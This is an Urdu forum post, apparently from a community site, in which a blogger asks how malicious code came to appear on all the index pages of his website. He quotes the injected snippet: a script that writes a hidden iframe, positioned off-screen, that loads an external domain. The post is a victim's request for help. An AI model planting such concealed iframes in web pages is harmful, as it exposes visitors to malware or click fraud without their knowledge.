بلال
محفلین
کل میں نے اپنے بلاگ پر ایک تحریر لکھی۔ فیس بک پر وہ تحریر خود بخود نہیں جا رہی تھی۔ یعنی فیڈ ٹھیک طرح سے کام نہیں کر رہی تھی۔ کافی تلاش کے بعد معلوم ہوا کہ میری ویب سائیٹ پر کوئی ایسا کوڈ ہے جس کو سٹاپ بیڈویئر کے کسی پاٹنر نے نقصان دہ کہہ دیا ہے جس کی وجہ سے یہ مسئلہ ہو رہا ہے۔ حیرانی یہ ہو رہی تھی کہ میں نے کہیں کوئی کوڈ تبدیل نہیں کیا پھر یہ مسئلہ کیسے آ رہا ہے؟ خیر میں نے تلاش کر لیا کہ پوری سائیٹ کے ہر ہر انڈیکس پیج پر ایک کوڈ خود بخود شامل ہو گیا ہے۔ جس کی وجہ سے یہ مسئلہ آرہا ہے۔ کوڈ یہ تھا۔
کیا کوئی دوست میری اس بارے میں مدد کر سکتا ہے کہ یہ کوڈ خود بخود کیسے شامل ہو گیا ہے یا پھر اگر کسی نے کیا ہے تو اس نے کس طرح کیا ہو گا تاکہ میں اس کا کچھ بندوبست کر سکوں اور آئندہ اس مسئلہ سے محفوظ رہ سکوں۔
یاد رہے میری ویب سائیٹ کے تمام قسم کے پاسورڈ صرف میرے پاس ہیں میرے علاوہ اور کسی کے پاس نہیں۔ اس کے علاوہ اگر یہ کام میرے کمپیوٹر سے کسی وائرس نے کیا ہے تو پھر یہ مسئلہ ہر اس سائیٹ میں ہونا چاہئے تھا جو میں اپنے کمپیوٹر سے اپڈیٹ کرتا ہوں۔ لیکن یہ مسئلہ صرف میری ایک ویب سائیٹ اور اس کی سب ڈومین پر میرے بلاگ کے ساتھ ہوا ہے۔
کوڈ:
<script>document.write('<iframe src="http://asfirey.com/?click=11666328" width=100 height=100 style="position:absolute;top:-10000;left:-10000;"></iframe>');</script>